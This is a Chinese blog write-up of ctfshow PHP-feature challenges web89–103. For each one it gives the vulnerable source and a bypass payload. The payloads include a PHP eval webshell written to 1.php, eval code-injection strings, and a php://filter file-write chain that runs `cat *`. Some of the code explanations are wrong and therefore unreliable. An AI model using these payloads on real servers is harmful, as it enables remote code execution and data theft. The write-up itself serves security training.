PHP特性篇(web89-103)

已于 2024-02-01 15:53:12 修改
阅读量805 收藏 28
点赞数 17
文章标签: php android 开发语言
于 2024-01-31 23:18:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80470992/article/details/135962336
版权

web89

分析源码

<?php

include("flag.php");
highlight_file(__FILE__);

if (isset($_GET['num'])) {
    $num = $_GET['num'];
    if (preg_match("/[0-9]/", $num)) {
        die("no no no!");
    }
    if (intval($num)) {
        echo $flag;
    }
}

首先,它包含了一个名为 "flag.php" 的文件,这个文件可能包含了某种标志(flag)信息。

然后,它使用 highlight_file(__FILE__) 语句来高亮显示当前 PHP 文件的内容,并将其输出到浏览器。这通常用于调试或教育目的,以便查看 PHP 代码的结构。

接着,它检查是否存在一个名为 "num" 的 GET 参数。如果存在,它将该参数的值赋给 $num 变量。

然后,它检查 $num 是否只包含数字。如果是,它将输出 "no no no!" 并终止脚本执行。这是一个简单的防御机制,用于防止恶意用户通过修改 "num" 参数来直接访问 "flag" 信息。

最后,如果 $num 不只包含数字(即通过了正则表达式检查),它将尝试将 $num 转换为整数。如果转换成功(即 $num 是一个整数),它将输出 "flag" 信息。这表明 "flag" 信息可能是与某种特定的整数输入相关联的。

由此可知如果我们传入一个数组的话,就可以绕过if

playload:num[]=1

web90

分析源码

<?php

include("flag.php");
highlight_file(__FILE__);
if (isset($_GET['num'])) {
    $num = $_GET['num'];
    if ($num === "4476") {
        die("no no no!");
    }
    if (intval($num, 0) === 4476) {
        echo $flag;
    } else {
        echo intval($num, 0);
    }
}

这个代码的关键在于

它检查 $num 是否等于 "4476"。如果是,它将输出 "no no no!" 并终止脚本执行。这是一个简单的防御机制,用于防止恶意用户通过修改 "num" 参数来直接访问 "flag" 信息。

如果 $num 不等于 "4476",脚本将尝试将 $num 转换为整数。这个转换使用了第二个参数 0,这意味着将使用十进制数进行转换。如果转换后的整数等于 4476,那么将输出 "flag" 信息。这表明 "flag" 信息可能是与输入的整数值为 4476 相关联的。

如果 $num 转换为整数后不等于 4476,则输出转换后的整数。

所以我们就可以得出

playload:?num=0x117c

web91

分析源码

 <?php

show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
} nonononono

这个代码的关键在于

$a=$_GET['cmd'];:这行代码从 GET 请求中获取名为 "cmd" 的参数,并将其值赋给 $a 变量

if(preg_match('/^php$/im', $a)){:这行代码使用正则表达式检查 $a 是否以 "php" 开头。/^php$/im 是一个正则表达式,其中:

^php 表示字符串必须以 "php" 开头。

$ 表示字符串必须以 "php" 结尾。

im 是正则表达式的标志,其中 i 表示不区分大小写,m 表示多行模式。

if(preg_match('/^php$/i', $a)){:这行代码再次使用正则表达式检查 $a 是否以 "php" 开头,这次使用了不区分大小写的标志 i。如果 $a 以 "php" 开头,它将输出 "hacker"。

else{ echo $flag; }:如果 $a 不以 "php" 开头,它将输出 "flag" 信息。这意味着 "flag" 信息可能与输入的字符串是否以 "php" 开头有关联。

如果 $a 不以 "php" 开头,脚本将输出 "nonononono"。

看起来很自相矛盾,但可以用表达式修饰符

补充:


不区分(ignore)大小写

m
多(more)行匹配
若存在换行\n并且有开始^或结束$符的情况下,
将以换行为分隔符,逐行进行匹配
$str = "abc\nabc";
$preg = "/^abc$/m";
preg_match($preg, $str,$matchs);
这样其实是符合正则表达式的,因为匹配的时候 先是匹配换行符前面的,接着匹配换行符后面的,两个都是abc所以可以通过正则表达式。

s
特殊字符圆点 . 中包含换行符
默认的圆点 . 是匹配除换行符 \n 之外的任何单字符,加上s之后, .包含换行符
$str = "abggab\nacbs";
$preg = "/b./s";
preg_match_all($preg, $str,$matchs);
这样匹配到的有三个 bg b\n bs

A
强制从目标字符串开头匹配;

D
如果使用$限制结尾字符,则不允许结尾有换行; 

e
配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行; 

所以payload:?cmd=a%0aphp

web92

分析源码

 <?php

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

和web90一样

所以 playload:?num=0x117c

web93

分析源码

 <?php

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

和92有点不一样

使用正则表达式检查 $num 是否包含小写字母。如果包含,脚本将输出 "no no no!" 并终止执行。

如果 $num 不等于 4476,并且不包含小写字母,脚本将尝试将其转换为整数。如果转换后的整数等于 4476,脚本将输出 "flag" 信息。否则,它将输出转换后的整数。

所以我们直接用小数

payload:?num=4476.2

web94

分析源码

<?php

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

关键

如果 $num 严格等于 "4476"(注意双等号,用于严格比较),脚本将输出 "no no no!" 并终止执行。

使用正则表达式检查 $num 是否包含小写字母。如果包含,脚本将输出 "no no no!" 并终止执行。

检查 $num 是否不包含字符 "0"。如果包含,脚本将输出 "no no no!" 并终止执行。

如果 $num 不等于 "4476",不包含小写字母,并且不包含字符 "0",脚本将尝试将其转换为整数。如果转换后的整数等于 4476,脚本将输出 "flag" 信息。

用8进制转换且在八进制前面加一个空格,这样strpos()会返回1,所以我们把4476转换为8进制10574后,前面再加一个空格即可

payload:?num= 010574

web95

分析源码

<?php

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

和上题比较没什么太大的变化

用上一题的playload就行了

web96

分析源码

 <?php

highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
}

这个代码传的是一个u,这个代码是弱比较,所以在前面加字符就可以绕过了

playload:u=./flag.php

web97

还是分析代码

<?php

include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

这关的关键在于它设置了两个 POST参数 'a' 和 'b'

然后,它检查 'a' 和 'b' 是否不相等

如果 'a' 和 'b' 不相等,脚本将使用 md5() 函数对这两个值进行哈希处理,并比较得到的哈希值是否相等。如果哈希值相等,脚本将输出 "flag" 变量的值。否则,它将输出 "Wrong."。

补充:

哈希处理是一种将任意长度的数据(通常是字符串)转换成固定长度散列值的过程。这个散列值通常用于唯一标识数据,或者用于快速查找、验证数据的完整性和真实性。哈希处理在计算机科学和信息安全领域有着广泛的应用。

哈希函数是实现哈希处理的核心,它接受输入数据并返回相应的哈希值。哈希函数的设计目标是使得对于不同的输入数据,尽可能产生不同的哈希值,并且保证相同的数据输入会产生相同的哈希值。但是,哈希函数通常无法反向操作,也就是说,无法从哈希值推导出原始的输入数据。

哈希处理的主要特点包括:

唯一性:对于不同的输入数据,尽可能产生不同的哈希值。理论上,如果两个输入数据的哈希值相同,那么它们被称为“哈希冲突”。虽然哈希冲突发生的概率极小,但在设计哈希函数时应该尽量减少这种情况的发生。

快速性:哈希函数应该能够快速地计算出输入数据的哈希值。这样可以提高数据处理的效率,特别是在需要频繁计算哈希值的场景下。

不可逆性:由于哈希函数通常是单向的,即无法从哈希值推导出原始的输入数据。这种不可逆性使得哈希处理在保护数据隐私和安全性方面具有重要作用。

所以

payload:a[]=1&b[]=2

web98

上源码

<?php

include("flag.php");
$_GET ? $_GET = &$_POST : 'flag';
$_GET['flag'] == 'flag' ? $_GET = &$_COOKIE : 'flag';
$_GET['flag'] == 'flag' ? $_GET = &$_SERVER : 'flag';
highlight_file($_GET['HTTP_FLAG'] == 'flag' ? $flag : __FILE__);

关键在于:如果get参数HTTP_FLAG的值为flag,就读取文件,也就是输出flag。

所以我们先通过get随便传一个参数上去,再通过post请求传HTTP_FLAG参数并赋值为flag即可获得flag

所以playload:

?1=4

POST: HTTP_FLAG=flag

web99

分析源码

 <?php

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

?>

in_array是弱类型比较,所以可以用数字+".php"的方式绕过判断,并写入一句话木马

所以按照这个思路,就写入一句话木马到1.php文件,内容是<?php eval($_POST[1]);?>

执行命令就可以了

web100

<?php

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v0 = is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if ($v0) {
    if (!preg_match("/\;/", $v2)) {
        if (preg_match("/\;/", $v3)) {
            eval("$v2('ctfshow')$v3");
        }
    }
}

$v1 = $_GET['v1'];$v2 = $_GET['v2'];$v3 = $_GET['v3'];:这些行从 GET 请求中获取参数 'v1'、'v2' 和 'v3',并将它们分别赋值给变量 $v1$v2 和 $v3

$v0 = is_numeric($v1) and is_numeric($v2) and is_numeric($v3);:这行代码检查 $v1$v2 和 $v3 是否都是数字。如果是,则 $v0 的值为 true,否则为 false

接下来的 if ($v0) 语句块包含了一些条件判断和可能的代码执行:

首先,它检查 $v2 是否不包含分号(;)。

如果 $v2 不包含分号,它会进一步检查 $v3 是否包含分号。

如果上述两个条件都满足,它会执行 eval("$v2('ctfshow')$v3");。这里使用了 eval 函数,它能够执行动态生成的 PHP 代码。根据提供的代码,当用户提供特定的输入时,可能会执行类 ctfshow 中的方法或函数。

v0赋值,赋值=的优先级高于逻辑运算。所以只要让is_numeric($v1)返回true即可满足if判断,and后面的无论结果如何都不影响。

payload?v1=21&v2=var_dump($ctfshow)/*&v3=*/;

web101

分析代码

<?php

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v0 = is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if ($v0) {
    if (!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)) {
        if (!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)) {
            eval("$v2('ctfshow')$v3");
        }
    }
}

和100比起来 ,这次特殊符号基本都被禁了

利用ReflectionClass建立ctfshow类的反射类,new ReflectionClass($class)获得class的反射对象(包含了元数据信息)。

payload?v1=1&v2=echo new Reflectionclass&v3=;

web102

分析代码

 <?php

highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if ($v4) {
    $s = substr($v2, 2);
    $str = call_user_func($v1, $s);
    echo $str;
    file_put_contents($v3, $str);
} else {
    die('hacker');
}
hacker

file_put_contents($v3, $str):这行代码将字符串 $str 写入文件,文件名由用户输入 $v3 决定

$v4 = is_numeric($v2) and is_numeric($v3):这里只验证 $v2 和 $v3 是否为数字。

call_user_func($method,$a)调用的参数是,v2第3位及之后的数字。那么我们需要在后面的数字着手,必须满足数字,科学计数e是唯一可以在is_numeric中不会影响判断数字的字符。所以可选字符只有0-9和e

使用 die('hacker') 来处理不安全的情况

v1是hex2bin;v2里先加上两个随意的数字,如11,然后加上php语句的base64转16进制的内容;v3是php伪协议语句

GET:
	cat(<?=`cat *`;):v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-
decode/resource=2.php
	tac(<?=`tac *`;):v2=11504438395948526859794171594473&v3=php://filter/write=convert.base64-
decode/resource=2.php
POST:v1=hex2bin
#访问2.php后查看源代码获得flag

web103

 <?php

highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if ($v4) {
    $s = substr($v2, 2);
    $str = call_user_func($v1, $s);
    echo $str;
    if (!preg_match("/.*p.*h.*p.*/i", $str)) {
        file_put_contents($v3, $str);
    } else {
        die('Sorry');
    }
} else {
    die('hacker');
}
hacker

比102多一点检查,但没什么关系,上一关的playload也能用

怀慈药王
关注
  • 17
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
php-7.2.4.tar.gz
04-12
将对PHP 7.2.4的核心特性、安装与配置、主要功能以及实际应用进行详尽的阐述。 一、PHP 7.2.4的核心改进 1. 性能提升:PHP 7.2系列相比PHP 5.x有显著的性能提升,特别是在7.2.4版本中,进一步优化了引擎,使得...
PHP和MySQL Web开发第4版pdf以及源码
10-13
php和mysql web开发(原书第4版)》:开发人员专业技术丛书。 目录 读者反馈 译者序 前言 作者简介 第一 使用PHP 第1章 PHP快速入门教程 1.1 开始之前:了解PHP 1.2 创建一个示例应用:Bob汽车零部件商店 ...
php特性(持续更新)
weixin_74427106的博客
03-29 270
它让我们不要输出数字,还需要让num为数字,但看到intval 我们就需要敏感;intval函数还有这一特点:intval处理一个数组对象时,会返回1;php特性一些函数的使用。先分析一下这个php代码。一下两个函数官方的解释。
ctfshow web入门 php特性
Sentiment的博客
04-11 5316
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
安恒暑期培训7-24wp
jojohacker的博客
09-27 376
BUU UPLOAD COURSE 1 发现了一段php代码 <?php highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 蚁剑扫一下在根目录下发现flag或者?file=/flag出现flag [BSidesCF 2020]Had a bad day 构造category=php://filter/convert.base64-enc
ctfshow_反序列化
qq_45951598的博客
01-27 1552
文章目录WEB254web255 WEB254 源码: error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-
CTFshow刷题日记-WEB-PHP特性(上89-115)
Love&Share
09-05 3471
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
WEB安全-杂类知识.pptx
08-24
主要探讨了两个核心主题:Webshell和NTFS文件流,它们在Web安全中扮演着重要的角色。 首先,Webshell,也称为网页后门,是一种恶意代码,黑客通过它可以在目标服务器上执行命令、上传/下载文件,甚至控制整个...
Galatolo WebManager-开源
04-24
通过这些特性,Galatolo WebManager 能够满足那些希望快速搭建并维护内容丰富、功能齐全的网站的用户。由于它是开源软件,用户不仅可以免费使用,还可以根据自身需求对其进行修改和扩展,这极大地增强了系统的可定制...
HTML5 实战PHPWeb页面表单设计
12-14
文章适合那些已经掌握基本HTML、CSS和PHP知识的读者,旨在教授如何利用HTML5的新特性构建一个简洁且功能完善的表单。 首先,我们需要了解HTML5中DOCTYPE的声明。在HTML5中,DOCTYPE的声明变得非常简洁,只需一...
CTFSHOW web入门刷题 web98-112
bys617120的博客
12-31 924
可以传递给v3任意值,然后v1=flag=v3的md5值,这里选择让v3为数组类型从而使得md5值为空,v1=v2后md5也为空。函数的限制,v2应该被赋值一个纯数字字符串,并且这个字符串的前面应该加上两个混淆字符以便函数体对方法进行正确调用。,v3变量应该传入一个文件名,并且将变量str中的数据传入到被定义的文件中,v3变量可以使用伪协议进行构建。用来写入文件,第一个参数是文件名,第二个参数是需要写进文件中的内容。调用方法或变量,第一个参数是调用的对象,第二个参数是被调用对象的参数。
PHP代码审计】ctfshow web入门 php特性 93-104
m0_63563528的博客
08-01 688
假设 “1.php” 是在 $allow 数组中,则会将 <?当访问 “1.php” 时,恶意代码 system(“tac flag36d.php”) 将会被执行,显示名为 “flag36d.php” 的文件内容的逆向(从最后一行到第一行)。正则表达式的含义是任意字符,后面跟着"p",后面跟着任意字符,后面跟着"h",后面再跟着任意字符,最后跟着"p",而。
php特性
yaoge1225的博客
07-20 261
php特性 正则解释器:https://regexper.com/ 在线转码:https://www.matools.com/hex web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(
CTFshow——web入门——php特性(上)
h_adam的博客
11-16 3984
web入门——php特性web89web90web91web92 web89 题目 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $fl
ctf show-web入门 php特性部分题解
volcano的博客
02-24 3319
ctfshowphp特性preg_match()intval()web96(路径问题)web98web99(in_array弱类型比较)in_array()web100var_dump()函数web101web102-103hex2bin()函数substr() 函数call_user_func()函数web104、106web105(双$$变量覆盖)web107(parse_str变量覆盖)parse_str()Parse_str()函数引起的变量覆盖漏洞web108(%00截断)ereg()函数strr
CTF-PHP代码审计,正则表达式记录
江湖
06-08 5899
1.flag In the variable ! &lt;?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ ...
成理信安大挑战ctf 部分wp
qq_51796436的博客
11-24 2896
第二届信安大挑战wp #mermaid-svg-bzITyqJePqUjjend .label{font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family);fill:#333;color:#333}#mermaid-svg-bzITyqJePqUjjend .label text{fill:#333}#mermaid-svg-bzITyqJePqUjjend .node rect,#mermaid-svg
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
最新发布
12年全栈程序开发
07-17 217
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
小欧吃苹果-OPPO 2024届校招正式批笔试题-数据开发(C卷)
sigd的博客
07-16 499
小欧吃苹果,拓扑排序处理贪心问题。
CTF Web题理论基础-第二课:工具集与php弱类型
在《002-CTF web题理论基础-第二课理论基础.pdf》和《002-CTF web题理论基础-第二课理论基础》中,我们学习了关于CTF网页题型的理论基础知识。本文总结了这些知识,并提供了一些相关的工具集和理论基础内容。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值